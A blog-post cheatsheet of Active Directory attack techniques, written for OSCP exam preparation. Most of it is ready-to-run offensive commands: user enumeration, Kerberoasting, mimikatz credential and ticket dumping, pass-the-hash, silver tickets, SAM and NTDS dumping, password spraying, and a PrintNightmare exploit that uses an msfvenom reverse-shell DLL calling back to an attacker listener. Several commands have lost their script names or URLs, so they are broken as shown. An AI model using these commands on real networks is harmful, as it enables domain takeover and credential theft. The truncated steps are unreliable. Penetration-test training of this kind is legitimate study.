Active Directory Cheatsheet

26. Apr 2022, by manu in posts

Here are some tips and tricks that got me thru the AD part of my OSCP exam.

Please note that this cheatsheet is outdated. A update is in progress.

Set DNS / hosts #

Add the DC and all found clients into your /etc/hosts file. dc1 client1

You could add the DC to your /etc/resolv.conf. But that will make internet research slower since all your requests would first go and then timeout at the DC.

Get a Shell or Credentials #

DNS Recon

Use fierce↗ to check for other servers inside the AD.

fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

User Recon

Use windapsearch↗ to make LDAP queries. Often does not require a password!

# Query users
windapsearch -m users --dc DCIP

# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'

# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP

# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password

Use Kerbrute↗ to enumerate users

kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt 
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Use CrackMapExec↗ to enumerate users

cme IP -u '' -p '' --users

# Get password policy
cme IP -u '' -p '' --pass-poll

Use username-anarchy↗ to format found names on company websites

username-anarchy -i INFILE > OUTFILE

Use cewl↗ to crawl websites for words to pack into a wordlist

cewl -d DEPTH -m MINIMUMLENGT --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE

RPC Recon

# Could require credentials
rpcclient -u '' IP 
    # Check printer description for passwords

impacket-rpcdump IP
# Check for PrinterNightmare
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

SMB Recon

Check for anonymous/open shares

smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP

After Shell and or Credentials #

Get a Shell #

Some ways to get a shell by just having a pair of credentials:

# Common
impacket-psexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-smbexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-wmiexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP

# Winrm (tcp/5985) need to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'

# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD'  IP

# Quite rare
impacket-atexec 'DOMAIN\user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN\user:PASSWORD@IP'

Check for ASREPRoast #

impacket-GetNPUsers 'DOMAIN\user:PASSWORD' -dc-ip DCIP 

Check for Kerberoast #

impacket-GetUserSPNs 'DOMAIN\user:PASSWORD@DCIP'

Basic PowerShell script you can run from a shell inside the AD:

$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain

# Search by what

$Result = $Searcher.Findall()

Write-Host "---------------------------"
Foreach($obj in $Result)
    ForEach($prop in $obj.Properties) {
        # uncommnent to print all attributes
    Write-Host "[SAM Account Name]"
    Write-Host ""
    Write-Host "[User Principal Name]"
    Write-Host ""
    Write-Host "[Service Principal Name]"
    Write-Host "---------------------------"

To request the ticket with PowerShell:

add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'

To request the ticket with mimikatz:

    kerberos::ask /target:SPN
    kerberos::list /export

Verify that the ticket is in memory with klist. Then use mimikatz↗ to export the ticket. This does not require admin or SYSTEM privileges.

    # Verify the ticket exists
    # Export to current folder
    kerberos::list /export

Transfer the ticket to Kali, and crack it with kerberoast↗.

# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone     
cd kerberoast
pip3 install pyasn1

# Crack
python /usr/share/wordlists/rockyou.txt ticket.kirbi

Cracking is also possible with Hashcat and kirbi2hashcat↗.

python ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

Check for the Big Exploits #

Those exploits only require valid domain credentials.

PrinterNightmare #


Check with:

impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
# Terminal 1
git clone
wget -O ./impacket/
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .

# Terminal 2
source impacket/bin/activate
cd impacket

msfvenom -p windows/shell_reverse_tcp LHOST=LISTEINGIP LPORT=LISTENINGPORT -f dll -o evil.dll drop $(pwd) -smb2support

# Set up listener

# Terminal 1
python3 '\\LISTEINGIP\drop\evil.dll'

SAM the Admin #


git clone
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt

python DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios

ZeroLogon #


git clone
cd zerologon


goldenPAC #


impacket-goldenPac ''

Tools #

Mimikatz #

# Hashdump
    # Elevate
    # Check for logged on passwords (requiers admin/system)
    # Dump SAM
    lsadump::lsa /patch

# Overpass the Hash
    sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
net use \\DC

# Pass the Ticket
    # Elevate
    # Export the tickets
    # Creates .kirbi files in current folder
    sekurlsa::tickets /export

    # Load Ticket on another client
    kerberos::ptt ticket.kirbi

# Silver Ticket
    # Elevate
    kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rce4:SERVICEHASH /ptt

Rubeus #

# Harvest TGTs
.\Rubeus.exe harvest /interval:30

# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket

# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200  /usr/share/wordlists/rockyou.txt

CrackMapExec #

# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success

Bloodhound #

# Start on Kali
sudo neo4j console
bloodhound --no-sandbox

# Remotely 
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All

# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName

Other Techniques #

KrbRelayUp #

Will get you a local SYSTEM shell if LDAP Signing and LDAP Channel Binding are not enforced

# Do not use cmd.exe or powershell.exe. Those will spawn on desktop not in shell
.\KrbRelayUp.exe relay -d -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"

# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"

Pass the Hash #

Works only on servers with NTML authentication.

pth-winexe -U USERHASH //IP cmd
evil-winrm -i IP -u USERNAME -H HASH

Dump local SAM and Crack Hashes #

On Windows

# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out

On Kali

samdump sam.out system.out -o hashes.txt

hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john  hashes.txt -format=nt -wordlist /usr/share/wordlists/rockyou.txt

Dump the NTDS # -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM local -pwd-last-set -user-status -history

DC Sync Attack #


SPN Impersonate #


# We need to have the same time as the DC
# Stop getting time from vhost
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo service sudo ntpdate DCIP -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate administrator DOM/USER
export KRB5CCNAME=Administrator.ccache

impacket-psexec -k DOMAIN/Administrator@DC -no-pass

# Revert NTP to VBox
sudo service virtualbox-guest-utils start

Show LAPS Passwords #

If an owned user is either LAPS admin or just LAPS reader:

ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -h DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd